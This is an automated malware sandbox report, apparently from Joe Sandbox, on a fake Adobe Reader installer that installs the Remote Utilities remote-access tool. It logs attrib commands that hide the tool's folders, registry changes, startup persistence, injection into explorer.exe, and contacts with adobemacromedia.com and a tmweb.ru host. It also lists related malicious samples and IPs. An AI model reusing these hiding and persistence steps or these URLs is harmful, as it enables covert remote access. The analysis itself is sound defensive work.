Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknownProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: unknownProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='3256Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='3256' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' EXE_CMD_LINE='/exenoupdates /exelang 0 /noprereqs ' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeProcess created: C:\Users\user\Desktop\CDaNsQ7Rrd.exe 'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'

Language, Device and Operating System Detection:

barindex
Queries information about the installed CPU (vendor, model number etc)Show sources
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the installation date of WindowsShow sources
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\preparing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\installing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_3256\finalizing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\collecting.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\preparing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\installing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\background.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\finalizing.jpg VolumeInformation
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality:

barindex
Detected Remote Utilities RATShow sources
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\*.*'
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\*.*'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\*.*'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host\*.*'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Source: C:\Windows\regedit.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters Options

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 74763 Sample: CDaNsQ7Rrd.exe Startdate: 30/08/2018 Architecture: WINDOWS Score: 40 139 Multi AV Scanner detection for dropped file 2->139 141 Too many similar processes found 2->141 143 Detected Remote Utilities RAT 2->143 145 Uses regedit.exe to modify the Windows registry 2->145 10 msiexec.exe 21 2->10         started        14 armforce.exe 2->14         started        16 CDaNsQ7Rrd.exe 51 2->16         started        18 5 other processes 2->18 process3 dnsIp4 133 adobemacromedia.com 104.28.4.137, 49161, 80 CLOUDFLARENET-CloudFlareIncUS United States 10->133 135 ca80628.tmweb.ru 10->135 121 C:\Users\user\AppData\...\setup.exe.part, PE32 10->121 dropped 123 {DE4C87A4-56DF-40F...B-9314F5F8610B}.job, VAX-order 10->123 dropped 20 setup.exe 10->20         started        23 cmd.exe 14->23         started        125 C:\Users\HERBBL~1\AppData\...\MSIECF5.tmp, PE32 16->125 dropped 127 C:\Users\HERBBL~1\AppData\...\MSIEC54.tmp, PE32 16->127 dropped 129 C:\Users\HERBBL~1\AppData\...\MSIB368.tmp, PE32 16->129 dropped 131 9 other files (none is malicious) 16->131 dropped 26 cmd.exe 16->26         started        28 cmd.exe 16->28         started        30 CDaNsQ7Rrd.exe 5 16->30         started        32 CDaNsQ7Rrd.exe 18->32         started        file5 process6 file7 107 C:\inst_fold\7zxa.dll, PE32 20->107 dropped 109 C:\inst_fold\7zaa.exe, PE32 20->109 dropped 111 C:\inst_fold\7za.dll, PE32 20->111 dropped 34 fp.exe 20->34         started        37 cmd.exe 20->37         started        39 7zaa.exe 20->39         started        153 Uses cmd line tools excessively to alter registry or file data 23->153 41 tasklist.exe 23->41         started        43 find.exe 23->43         started        47 61 other processes 23->47 49 4 other processes 26->49 51 4 other processes 28->51 113 C:\Users\HERBBL~1\AppData\...\Prereq.dll, PE32 32->113 dropped 115 C:\Users\HERBBL~1\AppData\...\MSI6D94.tmp, PE32 32->115 dropped 117 C:\Users\HERBBL~1\AppData\...\MSI61FE.tmp, PE32 32->117 dropped 119 8 other files (none is malicious) 32->119 dropped 45 CDaNsQ7Rrd.exe 32->45         started        signatures8 process9 file10 95 C:\inst_fold\armforce.exe, PE32 34->95 dropped 97 C:\inst_fold\armfix.reg, Little-endian 34->97 dropped 99 C:\inst_fold\armstatus.exe, PE32 34->99 dropped 101 C:\inst_fold\armstart.exe, PE32 34->101 dropped 53 cmd.exe 34->53         started        56 cmd.exe 34->56         started        58 armforce.exe 34->58         started        66 2 other processes 34->66 60 tasklist.exe 37->60         started        62 find.exe 37->62         started        64 tasklist.exe 37->64         started        69 3 other processes 37->69 103 C:\inst_fold\fp.exe, PE32 39->103 dropped process11 file12 147 Detected Remote Utilities RAT 53->147 149 Uses cmd line tools excessively to alter registry or file data 53->149 71 taskkill.exe 53->71         started        86 268 other processes 53->86 73 regedit.exe 56->73         started        76 attrib.exe 56->76         started        88 10 other processes 56->88 151 Injects code into the Windows Explorer (explorer.exe) 58->151 78 explorer.exe 58->78         started        80 cmd.exe 58->80         started        105 C:\Users\HERBBL~1\AppData\...\installer.exe, PE32 66->105 dropped 82 cmd.exe 66->82         started        84 installer.exe 66->84         started        signatures13 process14 signatures15 155 Detected Remote Utilities RAT 73->155 157 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 78->157 90 tasklist.exe 80->90         started        92 cscript.exe 82->92         started        process16 dnsIp17 137 ca80628.tmweb.ru 92.53.96.130, 49162, 80 TIMEWEB-ASRU Russian Federation 92->137

Simulations

Behavior and APIs

TimeTypeDescription
10:31:45API Interceptor29x Sleep call for process: CDaNsQ7Rrd.exe modified
10:31:46API Interceptor1244x Sleep call for process: msiexec.exe modified
10:33:29API Interceptor21x Sleep call for process: taskeng.exe modified
10:33:34API Interceptor98x Sleep call for process: tasklist.exe modified
10:33:37API Interceptor24x Sleep call for process: find.exe modified
10:33:43API Interceptor1x Sleep call for process: 7zaa.exe modified
10:33:54API Interceptor1x Sleep call for process: installer.exe modified
10:33:55API Interceptor1016x Sleep call for process: taskkill.exe modified
10:33:56API Interceptor11x Sleep call for process: attrib.exe modified
10:34:00AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\armwake.lnk
10:34:01API Interceptor2x Sleep call for process: reg.exe modified
10:34:05API Interceptor1x Sleep call for process: regedit.exe modified
10:34:11API Interceptor104x Sleep call for process: fp.exe modified
10:34:16API Interceptor1093x Sleep call for process: explorer.exe modified
10:34:21API Interceptor4x Sleep call for process: dllhost.exe modified
10:34:24API Interceptor2x Sleep call for process: cscript.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
CDaNsQ7Rrd.exe0%virustotalBrowse
CDaNsQ7Rrd.exe0%metadefenderBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe9%virustotalBrowse
C:\Users\HERBBL~1\AppData\Local\Temp\7ZipSfx.000\installer.exe6%metadefenderBrowse
C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\Prereq.dll0%virustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
adobemacromedia.com3%virustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://adobemacromedia.com/setup.exe3%virustotalBrowse
http://adobemacromedia.com/setup.exe0%Avira URL Cloudsafe
http://www.advancedinstaller.com00%Avira URL Cloudsafe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
CLOUDFLARENET-CloudFlareIncUS53Cheque10741.pdf.z.exe454678e7cd95477d250dad1e987c1201f4e969d6bc20c3d987bcf75ddf1ff1eemaliciousBrowse
  • 104.24.29.29
MalhaFinaApp.exe9b12c0617c26fb330406e3e6f382f58c5dbe2652f1c6e3c3464ecd6f8148de16maliciousBrowse
  • 104.31.10.172
e1e89c87-9f66-11e7-8388-80e65024849.exe89dbde4056616e40aa07744ca89b611de5978c050bd17f58112801807a9d7ee2maliciousBrowse
  • 104.16.91.188
wccftech.commaliciousBrowse
  • 104.20.11.37
https://web.airdroid.commaliciousBrowse
  • 104.16.20.35
mzN17oSU6p.jsb2272e6d165a35ba1174c8b957c01844e6db0f366873c89fee2ff0f18d9c1af6maliciousBrowse
  • 104.20.74.28
mssecsvc.exedbf3890b782ac04136c3336814eef97e3c0f4133f9592e882c131c179161b27bmaliciousBrowse
  • 104.17.38.137
uRYgdrK9N.exe4f9246ba1efd8c4fe60da2ad48a50cc8473df8462596944cd1d326a0f30041c3maliciousBrowse
  • 104.17.68.104
67Order.execebe3b664d64c97a7683a0fad06e6c45affe0deb8c15fb3e37552b97a6be5938maliciousBrowse
  • 104.16.17.96
5INV & P.L.exe74ecf02ce3b8b94374b2f867b143abbb4439d19023105fbb2d3a4970269216c9maliciousBrowse
  • 104.16.18.96
http://ksksks.barsiksuperkot.org/?utm_medium=0b55674fb5dbcffa531ca5159eb4b7420bc4fb78&utm_campaign=177maliciousBrowse
  • 104.31.94.164
TEST1.doc1c5b8339a0865d607c627ba1c29d0dd3968bce2bb2f85e2bc3e8302c08ea8635maliciousBrowse
  • 104.20.209.21
67quotatio.exe236a137f3628a01f3b5d98a17062a1b014de25f4f7c4a5acd7c8b4c8daa39d44maliciousBrowse
  • 104.31.92.140
41proforma invoice.exe82f08793b891d357626e5f68a232b36c6b02e6b2dec6062143cfc249b2d34566maliciousBrowse
  • 104.16.17.96
http://imprismail.com/affiliate/referral.asp?site=rea&url=pop/en/ukc/1&aff_id=5843_27027_19234_535127_1_357_maliciousBrowse
  • 104.20.63.152
d5#U309a.doc7bb52f08b24ad4122cdbd6d18869278b92be14ca07298fd8311d7c2e6b89f968maliciousBrowse
  • 104.20.209.21
30PO-1639.exe1b92ac282dfa32fe1286f60fec9855cdfa8b702ff256253f3d17521ffea9ae5emaliciousBrowse
  • 104.17.68.104
11Order # 000001122.exee37cdbfa767e77da871daf75556887f08969fdc1bed27d716d72ca6803d04519maliciousBrowse
  • 104.16.17.96
43wallet.aes.js.jsbf573b716bc0afd48c474c7bc88b817beced81277e37796fde009f6d0b52df6fmaliciousBrowse
  • 104.27.160.33
https://indimetalsac.com/aah/scan.htmlmaliciousBrowse
  • 104.27.138.193
TIMEWEB-ASRUInformationen940934865.docaa6b8004d075bd0180a4a17ba1815658c9162df7cd313ba6246b278f812142f8maliciousBrowse
  • 92.53.96.13
2018-01-10_12-13-23.execb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050maliciousBrowse
  • 92.53.105.14
2017-12-28-Rig-EK-landing-page.html1b2017ee03927583f72cde2c06da3886f04dd1f76182029194b2105379e78a8cmaliciousBrowse
  • 176.57.214.103
Invoices attached.doc97d3814120b3441950ab9b0ca6676420cf968d90900a037644d5cce08c14816fmaliciousBrowse
  • 92.53.96.178
Document-needed.docf877a8406d60ae5c3fce22da9512425b089dbc8da56016fbed2f5985b49a5ae8maliciousBrowse
  • 92.53.96.178
#U437#U430 #U430#U43f#U440#U435#U43b#U44c.jsb61f1c4f35fe01ff926d8a7d8b91ed95d83ce565a1db5838f38f074f3a7aa700maliciousBrowse
  • 92.53.96.18
12 #U430#U43f#U440 2018.jsdc383b9ba9083572d2cba7885048f82df700e61f65680b358aa7d3518a3532camaliciousBrowse
  • 92.53.96.18
12 #U430#U43f#U440 2018.jsdc383b9ba9083572d2cba7885048f82df700e61f65680b358aa7d3518a3532camaliciousBrowse
  • 92.53.96.18
http://www.mixturro.com/LLC/Invoice/maliciousBrowse
  • 92.53.96.107
Invoices attached.doc97d3814120b3441950ab9b0ca6676420cf968d90900a037644d5cce08c14816fmaliciousBrowse
  • 92.53.96.178
Document-needed.docf877a8406d60ae5c3fce22da9512425b089dbc8da56016fbed2f5985b49a5ae8maliciousBrowse
  • 92.53.96.178
Hancitor25.04.doc42c23d01becdf472da20e1e2f20316a56fd549a36cec0ac9967f730e2fded31bmaliciousBrowse
  • 92.53.107.93
2018_4_26_april.js9a33838947857a3d9717a55b81540b21dd53a3b1d626edac29d922262b31e557maliciousBrowse
  • 92.53.118.146
2018_4_26_april.js9a33838947857a3d9717a55b81540b21dd53a3b1d626edac29d922262b31e557maliciousBrowse
  • 92.53.118.146
45CanadaPost.js86aad7dfdf743575bb58c78dfe529447305e97b141d7f680384513f62661644dmaliciousBrowse
  • 92.53.118.144
53Purchase Order.exe92ebf38bc6442dc52502d891b81ca1d085425b6f38343ce9efc9887d3cca96dfmaliciousBrowse
  • 92.53.96.139
30Label_000115602.doc.jsb18422d3d33fce0a3d32f01e6bae2c9fde695eb00bcecc7c570429eae7e2fe16maliciousBrowse
  • 92.53.96.94
HHemAoXDg.exe5c32e0d2a69fd77e85f2eecaabeb677b6f816de0d82bf7c29c9d124a818f424fmaliciousBrowse
  • 188.225.46.219
Emotet.docf04475ef220a30546e1f7f5628c3059a3a0fbcc968e5992f79a8edb12d9c7096maliciousBrowse
  • 92.53.118.146
#U437#U430 #U430#U43f#U440#U435#U43b#U44c.jsb61f1c4f35fe01ff926d8a7d8b91ed95d83ce565a1db5838f38f074f3a7aa700maliciousBrowse
  • 92.53.96.18

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
C:\inst_fold\7za.dlltes2.exed5d121c266920034026c83be987253b6c8a47b6d7a35147fe6c9f7b9e6c25e06maliciousBrowse
    C:\inst_fold\7zaa.exetes2.exed5d121c266920034026c83be987253b6c8a47b6d7a35147fe6c9f7b9e6c25e06maliciousBrowse
      runme.exe5cb1c8a2c2e0f782e2d6c61db8bff3febfd7d271bc3e33864c719896d70ac7e6maliciousBrowse

        Screenshots